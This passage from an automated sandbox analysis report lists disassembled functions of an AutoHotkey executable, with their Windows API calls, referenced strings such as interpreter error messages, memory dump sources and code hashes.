                                      • CoInitialize.OLE32 ref: 0045E5CB
                                      • CoCreateInstance.OLE32(004AD820,00000000,00000001,004AD810,00000000), ref: 0045E5E4
                                      • __fassign.LIBCMT ref: 0045E656
                                      • GetKeyboardLayout.USER32(00000000), ref: 0045E6A0
                                      • __fassign.LIBCMT ref: 0045E6F1
                                        • Part of subcall function 0049A0CD: __fassign.LIBCMT ref: 0049A0C3
                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 0045E73E
                                      • CoUninitialize.OLE32 ref: 0045E78F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign$CreateFullInitializeInstanceKeyboardLayoutNamePathUninitialize
                                      • String ID:
                                      • API String ID: 404581262-0
                                      • Opcode ID: b14142beedf871b8961df21b345b22b46e5239afd347ff8266b5eb3752589e01
                                      • Instruction ID: 5284303a1726f87cd4c98a1307fd75b87fe7ed5e41c5e86c3c7f21c300e6447d
                                      • Opcode Fuzzy Hash: b14142beedf871b8961df21b345b22b46e5239afd347ff8266b5eb3752589e01
                                      • Instruction Fuzzy Hash: 3D61EFB0204301AFD218EF64CC84FAB77A5AF99704F10485DF9449B2D2D7B9ED49C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042B300 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 197COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0042B40A
                                      • _wcschr.LIBCMT ref: 0042B425
                                        • Part of subcall function 0042B270: GetFileAttributesW.KERNEL32(0042B33F,00000000,?,00000000), ref: 0042B2A0
                                        • Part of subcall function 0044F7D0: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 0044F7E2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AttributesFile$FolderPath_wcschr
                                      • String ID: #Include %-0.*s#IncludeAgain %s$.ahk$\AutoHotkey\Lib\$\Lib\
                                      • API String ID: 3341327518-2992999288
                                      • Opcode ID: 65168d809d77c541dccfd6a0f91f569833fc23373cbdcc7b4ac0846ede3acb22
                                      • Instruction ID: aca0cd2f48d07780b1f690afb8553c7a90bdd57ff97b266b6ccc015802d10e61
                                      • Opcode Fuzzy Hash: 65168d809d77c541dccfd6a0f91f569833fc23373cbdcc7b4ac0846ede3acb22
                                      • Instruction Fuzzy Hash: BF61D1317002159FD710DF28E881BAB73A4EF95318F40452FF9458B3A2EB78A955C7EA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004037DC Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick_free_wcsncpy
                                      • String ID: 6Dd$OnMessage$call
                                      • API String ID: 2355968416-2965414497
                                      • Opcode ID: 94aa33ef4542e3fb1d5e745e578a54d34f45c8483eb8e71d96474b0f5380e880
                                      • Instruction ID: e06a679a2f8b3723799ba155fb6c03cc7529b83a70cecacdadb6cc47ba399112
                                      • Opcode Fuzzy Hash: 94aa33ef4542e3fb1d5e745e578a54d34f45c8483eb8e71d96474b0f5380e880
                                      • Instruction Fuzzy Hash: 3D718AB1605340CFC720DF29D88099BBBE9FB85305B18897FE4899B361D739E905CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004406D0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044DE50: GetForegroundWindow.USER32(?,?,00440955,?), ref: 0044DE7E
                                        • Part of subcall function 0044DE50: IsWindowVisible.USER32(00000000), ref: 0044DE99
                                      • __fassign.LIBCMT ref: 00440724
                                        • Part of subcall function 0049BF9D: wcstoxl.LIBCMT ref: 0049BFAD
                                      • __fassign.LIBCMT ref: 00440760
                                      • GetWindowRect.USER32(00000000,?), ref: 004407A6
                                      • GetWindowRect.USER32(00000000,?), ref: 004407D8
                                      • GetParent.USER32(00000000), ref: 00440803
                                      • ScreenToClient.USER32(00000000,80000000), ref: 00440813
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000001,?,?,?,?,?,?,?,?,00433089), ref: 004408BA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$Rect__fassign$ClientForegroundMoveParentScreenVisiblewcstoxl
                                      • String ID:
                                      • API String ID: 4198355719-0
                                      • Opcode ID: e589524636ec4758f63786f72f9a228125c27e4cbb4b0c95fd1acbcf600f3f9b
                                      • Instruction ID: 615de26f4d091cdac34427a22d3fd61f551544865516f3abe097c860466729f0
                                      • Opcode Fuzzy Hash: e589524636ec4758f63786f72f9a228125c27e4cbb4b0c95fd1acbcf600f3f9b
                                      • Instruction Fuzzy Hash: F251CD71A043019BE710EF249C81B5B77E4AB84750F14092EFA45AB391D77CEC95CBAB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004176E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(004D8620), ref: 00417778
                                      • GetSystemMetrics.USER32(00000000), ref: 004177F0
                                      • GetSystemMetrics.USER32(00000001), ref: 004177F6
                                      • GetCursorPos.USER32(?), ref: 00417855
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CursorMetricsSystem
                                      • String ID: d
                                      • API String ID: 3091566494-2564639436
                                      • Opcode ID: 0ab173258bfbc79ebe5f79f04c1e0a29e8bec6fbf91122351addc25f7814e17a
                                      • Instruction ID: dfb326f163c00021a23dabafdc4329bef19cbd18e99c5c13a5ba0fcf293a0a84
                                      • Opcode Fuzzy Hash: 0ab173258bfbc79ebe5f79f04c1e0a29e8bec6fbf91122351addc25f7814e17a
                                      • Instruction Fuzzy Hash: C0519E75B092028BD714DF18D881BAA77E1BB88714F14493EE886C7341DB39E989CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00471370 Relevance: 10.7, APIs: 7, Instructions: 155COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcstoui64.LIBCMT ref: 004713B7
                                      • GetDlgCtrlID.USER32(00000000), ref: 004713C2
                                      • GetParent.USER32(00000000), ref: 004713D1
                                      • GetDlgCtrlID.USER32(00000000), ref: 004713DE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Ctrl$Parent__wcstoui64
                                      • String ID:
                                      • API String ID: 2645479964-0
                                      • Opcode ID: 6f5ffaa6941be87318af1f61cdec3181d4bc5529197e71192db96c64a764c201
                                      • Instruction ID: bb57b39d41510f8c91a2e896f5283da17579297f67e8f0a29fc8fbae80f25e4e
                                      • Opcode Fuzzy Hash: 6f5ffaa6941be87318af1f61cdec3181d4bc5529197e71192db96c64a764c201
                                      • Instruction Fuzzy Hash: 4541F1327002015BDB209E2CDC85BFF73A6EB81715F158437FA059B2A1DB39E85687AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00482840 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 137COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign_wcschr$wcstoxl
                                      • String ID: .-+$1.1.37.01
                                      • API String ID: 1230976502-4065018320
                                      • Opcode ID: ce88e834ff6540ac4c34ef827675916ab095229ad5d39cd337bc334b64f94041
                                      • Instruction ID: 8473a6dbccc63186dee87f0a8676d8d5553935e9c115bff7946f0a535ef4da0d
                                      • Opcode Fuzzy Hash: ce88e834ff6540ac4c34ef827675916ab095229ad5d39cd337bc334b64f94041
                                      • Instruction Fuzzy Hash: 4931A7F6B04215868F247A169AC123F73D4EB55761F240E6BF412C6290E7EC8DC5936B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0046766E Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcsicoll.LIBCMT ref: 0046772D
                                        • Part of subcall function 00474310: GetPropW.USER32(?,ahk_autosize), ref: 00474324
                                        • Part of subcall function 00474310: RemovePropW.USER32(?,ahk_autosize), ref: 0047433F
                                        • Part of subcall function 00474310: GetWindowRect.USER32(?,?), ref: 0047437E
                                        • Part of subcall function 00474310: GetWindowRect.USER32(?,?), ref: 004743BF
                                        • Part of subcall function 00474310: MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 00474400
                                        • Part of subcall function 00474310: GetWindowLongW.USER32(?,000000F0), ref: 0047441C
                                      • _free.LIBCMT ref: 0046785E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$PropRect$LongPointsRemove__wcsicoll_free
                                      • String ID: Exact$Parameter #2 invalid.$Parameter #3 invalid.$Tab name doesn't exist yet.
                                      • API String ID: 1019984171-577477998
                                      • Opcode ID: 20326a5ba1ce4a8c80f9fdbb2dd063690e1a21785f64bc7c705d2543bd5d0961
                                      • Instruction ID: 0f5877889ab81f2fb16a6c53c855da9c5bfb7546a189e2cfcbc2c4ee9d3138a9
                                      • Opcode Fuzzy Hash: 20326a5ba1ce4a8c80f9fdbb2dd063690e1a21785f64bc7c705d2543bd5d0961
                                      • Instruction Fuzzy Hash: 5A419130A0D3408ACB209F6588407AE7BE5AB91358F18491FF9858B392E77CDD45C7AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004334D8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • Parameter #1 must not be blank in this case., xrefs: 0043356C
                                      • Delete, xrefs: 004335B3
                                      • Target label does not exist., xrefs: 0043350C
                                      • Parameter #2 invalid., xrefs: 004335EA
                                      • Parameter #1 invalid., xrefs: 00433536
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Delete$Parameter #1 invalid.$Parameter #1 must not be blank in this case.$Parameter #2 invalid.$Target label does not exist.
                                      • API String ID: 3832890014-14243736
                                      • Opcode ID: d73222ed3f77a20571a5772824bb5952d45f75951e80014aafe066afec3bb9de
                                      • Instruction ID: 3c56a17159200bc7323e9082a88066785b87e6399f1e11d670167195e7c504db
                                      • Opcode Fuzzy Hash: d73222ed3f77a20571a5772824bb5952d45f75951e80014aafe066afec3bb9de
                                      • Instruction Fuzzy Hash: 4741D471B842007BEB209E158C02F6B73B5AB89715F24542FF8189B391D7BDEE41876E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00486270 Relevance: 10.6, APIs: 7, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,0043397D,?,00000000), ref: 0048628C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ForegroundWindow
                                      • String ID:
                                      • API String ID: 2020703349-0
                                      • Opcode ID: ab6e80ae928b1ffa683521c2860787cece8a328c6e89f92090e1b3486b11ed78
                                      • Instruction ID: ee77ccb0f1229a59f12da3a57baef158f02274e1db10a80bdfbd89a0f63d3202
                                      • Opcode Fuzzy Hash: ab6e80ae928b1ffa683521c2860787cece8a328c6e89f92090e1b3486b11ed78
                                      • Instruction Fuzzy Hash: 623148727011016BE790B724AC41F7FB799DBD132AF22093BF901DA280EB299C4183A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042F2B1 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: +-*&~!$-$Expression too long$Missing close-quote$Out of memory.
                                      • API String ID: 2691759472-2428279368
                                      • Opcode ID: 70016c92c137f777b00cc642960834994c6f9399d4104470ab9ff7e6849d55fe
                                      • Instruction ID: 1588306d6da921be8bf4bb5e3526f79fe35ad6370e4d73b5910f7690c4c34a70
                                      • Opcode Fuzzy Hash: 70016c92c137f777b00cc642960834994c6f9399d4104470ab9ff7e6849d55fe
                                      • Instruction Fuzzy Hash: 3B310075B80225E7CF24DE45D8817BE72B0AB04B10FB441BBEC55A32C0E67DAE45CA69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0046B09E Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000192), ref: 0046B0BE
                                      • SendMessageW.USER32(?,00000030,?,?), ref: 0046B0F3
                                      • SendMessageW.USER32 ref: 0046B107
                                      • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0046B120
                                      • GetSystemMetrics.USER32(00000003), ref: 0046B133
                                      • MulDiv.KERNEL32(00000008,00000060,00000060), ref: 0046B165
                                      • GetSystemMetrics.USER32(00000003), ref: 0046B189
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$MetricsSystem
                                      • String ID:
                                      • API String ID: 3542082049-0
                                      • Opcode ID: 70c031aae732f47cfc3ab0d1d2015c741b66ea58a022e6316f7fdaf0d327b8ce
                                      • Instruction ID: d1bf28363fa887d427dc87c3bf29de07d86ed5db2934bd597699f7590ae87244
                                      • Opcode Fuzzy Hash: 70c031aae732f47cfc3ab0d1d2015c741b66ea58a022e6316f7fdaf0d327b8ce
                                      • Instruction Fuzzy Hash: C031AFB5748380AFD325CB54CCA5BAA7BA5FB8A300F04445EF58A9B2C1D774A801CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00462180 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ComObj$ComObjArray$ComObjRef$ComObject
                                      • API String ID: 0-4247866589
                                      • Opcode ID: 93cc88699e0a0a672be6007e5a5278b9b6cfab64b3cd2fbeccf7091b198b0e22
                                      • Instruction ID: 4a6c724f08449a04d781825f8952dd52a345a76cc97d103b364f04dd4bd7a545
                                      • Opcode Fuzzy Hash: 93cc88699e0a0a672be6007e5a5278b9b6cfab64b3cd2fbeccf7091b198b0e22
                                      • Instruction Fuzzy Hash: 3B11B225705601ABD6148A1DE944F666398EF85711F24496BF600C77D0EBA8DC44C3AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00473870 Relevance: 10.6, APIs: 7, Instructions: 66windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0047388C
                                      • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004738A0
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004738CF
                                      • GetSysColor.USER32(00000005), ref: 004738E3
                                      • SendMessageW.USER32(?,00001026,00000000,?), ref: 004738F6
                                      • SendMessageW.USER32(?,00001001,00000000,?), ref: 00473903
                                      • InvalidateRect.USER32(00000000,00000000,00000001,?,0000000B,00000000,00000000,?,00000192,?,?), ref: 0047390C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$ColorInvalidateRect
                                      • String ID:
                                      • API String ID: 2722326260-0
                                      • Opcode ID: 3e7659e6f9082ed6dc79fcb128e74a30ed78c172b3edf45ec36e39176db946fd
                                      • Instruction ID: ce49840a3c1865a27f7a96bb7525aabdba85ace422e6c0018a795d5ff722140c
                                      • Opcode Fuzzy Hash: 3e7659e6f9082ed6dc79fcb128e74a30ed78c172b3edf45ec36e39176db946fd
                                      • Instruction Fuzzy Hash: D7116070640301ABD6309F688C85FD7B7A8BF4CB11F25461AFA99A73C0D3B4A8819A58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044A145 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044A16E
                                      • mciSendStringW.WINMM(status cd mode,?,00000080,00000000), ref: 0044A187
                                      • mciSendStringW.WINMM(close cd wait,00000000,00000000,00000000), ref: 0044A196
                                      Strings
                                      • status cd mode, xrefs: 0044A182
                                      • open %s type cdaudio alias cd wait shareable, xrefs: 0044A146
                                      • close cd wait, xrefs: 0044A18F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: SendString$_vswprintf_s
                                      • String ID: close cd wait$open %s type cdaudio alias cd wait shareable$status cd mode
                                      • API String ID: 3589064202-1182961480
                                      • Opcode ID: 4c4a8c5bf0ea6b50bda6c9ec065e4b5e1ead1c44c0c679a6e2156b68cb87758b
                                      • Instruction ID: 83100f4548e1a52b38ec0aadeb75b89eb01e0ea37288db2e344648ea897d45e5
                                      • Opcode Fuzzy Hash: 4c4a8c5bf0ea6b50bda6c9ec065e4b5e1ead1c44c0c679a6e2156b68cb87758b
                                      • Instruction Fuzzy Hash: A301B1727C430476E630E6659C43FDBB758DB84B61F60062BBB18AB1C0DEE9680486ED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B6A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: FAST$RegEx$SLOW
